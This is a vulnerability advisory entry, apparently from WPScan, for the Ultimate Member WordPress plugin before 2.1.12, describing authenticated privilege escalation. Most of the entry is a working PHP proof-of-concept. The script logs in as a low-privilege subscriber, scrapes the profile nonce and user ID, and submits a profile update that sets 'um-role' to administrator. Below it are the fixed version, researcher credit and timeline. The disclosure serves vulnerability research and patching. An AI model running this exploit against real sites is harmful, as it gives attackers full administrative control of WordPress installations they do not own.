WordPress Plugin Vulnerabilities
Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update
Description
Due to the fact that Ultimate Member allowed the creation of new roles, this plugin also made it possible for site administrators to grant secondary Ultimate Member roles for all users upon a /wp-admin profile update.
Proof of Concept
<?php
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
$name = $argv[4];
$lastname = $argv[5];
$nickname = $argv[6];
$email = $argv[7];
// 1) Log in as subscriber (with wp-admin access)
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'log' => $wp_user,
'pwd' => $wp_pass,
'rememberme' => 'forever',
'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);
// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/profile.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];
// Pull the user_id
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/profile.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/"checkuser_id"\svalue="([^"]+)"/', $content, $matches);
$user_id = $matches[1];
// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/profile.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'_wpnonce' => $nonce,
'_wp_http_referer' => '%2Fwp-admin%2Fprofile.php',
'from' => 'profile',
'check_userid' => $user_id,
'admin_bar_front' => '1',
'first_name' => $name,
'last_name' => $lastname,
'nickname' => $nickname,
'email' => $email,
'url' => '',
'description' => '',
'pass1' => '',
'pass2' => '',
'um-role' => 'administrator',
'action' => 'update',
'user_id' => $user_id,
'submit' => 'Update+Profile'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
Affects Plugins
Fixed in 2.1.12 References
Classification
Type
PRIVESC
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2020-11-09 (about 3 years ago)
Added
2020-11-09 (about 3 years ago)
Last Updated
2021-01-09 (about 3 years ago)
WPScan 